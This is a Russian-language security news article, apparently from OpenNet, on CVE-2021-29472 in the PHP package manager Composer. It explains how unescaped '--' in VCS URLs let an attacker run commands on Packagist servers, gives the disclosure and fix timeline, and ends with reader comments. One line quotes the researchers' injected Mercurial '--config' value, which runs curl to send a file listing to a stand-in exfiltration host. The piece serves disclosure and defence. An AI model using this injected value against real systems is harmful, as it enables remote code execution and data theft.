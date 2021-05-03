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Уязвимость в пакетном менеджере Composer, допускающая компрометацию PHP-репозитория Packagist

03.05.2021 08:24

В менеджере зависимостей Composer выявлена критическая уязвимость (CVE-2021-29472), позволяющая выполнить произвольные команды в системе при обработке пакета со специально оформленным значением URL, определяющим адрес для загрузки исходных текстов. Проблема проявляется в компонентах GitDriver, SvnDriver и HgDriver, применяемых при использовании систем управления исходными текстами Git, Subversion и Mercurial. Уязвимость устранена в выпусках Composer 1.10.22 и 2.0.13.

Особо отмечается, что проблема главным образом затронула по умолчанию применяемый в Composer репозиторий пакетов Packagist, насчитывающий 306 тысяч пакетов для разработчиков на языке PHP и ежемесячно обслуживающий более 1.4 миллиарда загрузок. В ходе эксперимента показано, что в случае наличия сведений о проблеме атакующие могли бы получить контроль над инфраструктурой Packagist и перехватить учётные данные сопровождающих или перенаправить загрузку пакетов на сторонний сервер, организовав доставку вариантов пакетов с вредоносными изменениями для подстановки бэкдора в процессе установки зависимостей.

Опасность для конечных пользователей ограничивается тем, что содержимое composer.json обычно определяется самим пользователем, а ссылки на исходные тексты передаются при обращении к сторонним репозиториям, обычно заслуживающим доверия. Основной удар пришёлся на репозиторий Packagist.org и сервис Private Packagist, вызывающие Composer с передачей данных, полученных от пользователей. Злоумышленники могли выполнить свой код на серверах Packagist разместив специально оформленный пакет.

Команда Packagist устранила уязвимость в течение 12 часов после поступления сообщения об уязвимости. Исследователи в частном порядке уведомили разработчиков Packagist 22 апреля и в тот же день проблема была исправлена. Публичное обновление Composer с устранение уязвимости было опубликовано 27 апреля, а детали были раскрыты 28 апреля. Аудит логов на серверах Packagist не выявил связанной с уязвимостью подозрительной активности.

Проблема вызвана ошибкой в коде проверки корректности URL в корневом файле composer.json и ссылках для загрузки исходных текстов. Ошибка присутствует в коде с ноября 2011 года. В Packagist для организации загрузки кода без привязки к конкретной системе управления исходными текстами применяются специальные прослойки, которые выполняются при помощи вызова "fromShellCommandline" с передачей аргументов командной строки. Например, для git вызывается команда "git ls-remote --heads $URL", где URL обработан при помощи метода "ProcessExecutor::escape($url)", экранирующего потенциально опасные конструкции, такие как "$(...)" или "`...`".

Суть проблемы в том, что метод ProcessExecutor::escape не экранировал последовательность "--", что позволяло указать в URL любой дополнительный параметр вызова. Подобное экранирование отсутствовало в драйверах GitDriver.php, SvnDriver.php и HgDriver.php. Атаке через GitDriver.php мешало то, что команда "git ls-remote" не поддерживала указание дополнительных аргументов после пути. Возможной оказалась атака на HgDriver.php через передачу параметра "--config" утилите "hq", позволяющего организовать выполнение любой команды через манипуляцию с настройкой "alias.identify". Например, для загрузки и выполнения кода через запуск утилиты curl можно было указать: 


   --config=alias.identify=!curl http://exfiltration-host.tld --data “$(ls -alh)”

Разместив в Packagist тестовый пакет с подобным URL, исследователи убедились, что после размещения на их сервер поступил HTTP-запрос с одного из серверов Packagist в AWS, содержащий листинг файлов в текущем каталоге.

  1. Главная ссылка к новости (https://blog.sonarsource.com/p...)
  2. OpenNews: Атаковавшие SolarWinds смогли получить доступ к коду Microsoft (дополняется)
  3. OpenNews: Подтверждён факт взлома инфраструктуры проекта PHP
  4. OpenNews: Атака на зависимости позволила выполнить код на серверах PayPal, Micrоsoft, Apple, Netflix, Uber и ещё 30 компаний
  5. OpenNews: Отчёт о компрометации git-репозитория и базы пользователей проекта PHP
  6. OpenNews: Уязвимость, позволяющая удалённо выполнить код на сервере PHP-репозитория Packagist
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/55065-composer
Ключевые слова: composer, packagist
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Обсуждение (9) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Онаним (?), 09:24, 03/05/2021 [ответить]  
    		• +/
    Это не баг, это фича.
     
     
  • 2.2, Онаним (?), 09:25, 03/05/2021 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    (СtI/CtD = continous trojan integration / continuous trojan deployment)
     

  • 1.3, Аноним (3), 09:43, 03/05/2021 [ответить]  
    		• +/
    > ежемесячно обслуживающий более 1.4 миллиарда загрузок

    Кто все эти люди? Индусы и китайцы? И это какой-то реально полезный софт?

     
     
  • 2.5, Онаним (?), 09:52, 03/05/2021 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    В основном это автоматические деплоеры, которым абсолютно пофиг, сколько там троянов внутри.
     
     
  • 3.9, Анто769ним (?), 10:17, 03/05/2021 [^] [^^] [^^^] [ответить]  
    		• +/
    А деплоят они на локалхост, ага
     

  • 1.4, Аноним (4), 09:44, 03/05/2021 [ответить]  
    		• +/
    Картина Репина: похапешники и безопасность
     
     
  • 2.6, Онаним (?), 09:53, 03/05/2021 [^] [^^] [^^^] [ответить]  
    		• +2 +/
    Я бы сказал, девляпсы и безопасность.
    Композер долго держался молодцом сравнительно со всякими npm.
     

  • 1.7, user90 (?), 09:59, 03/05/2021 [ответить]  
    		• +/
    PornDriver
     
  • 1.10, Аноним (10), 10:35, 03/05/2021 [ответить]  
    		• +/
    Драйверы. На пхп.
     

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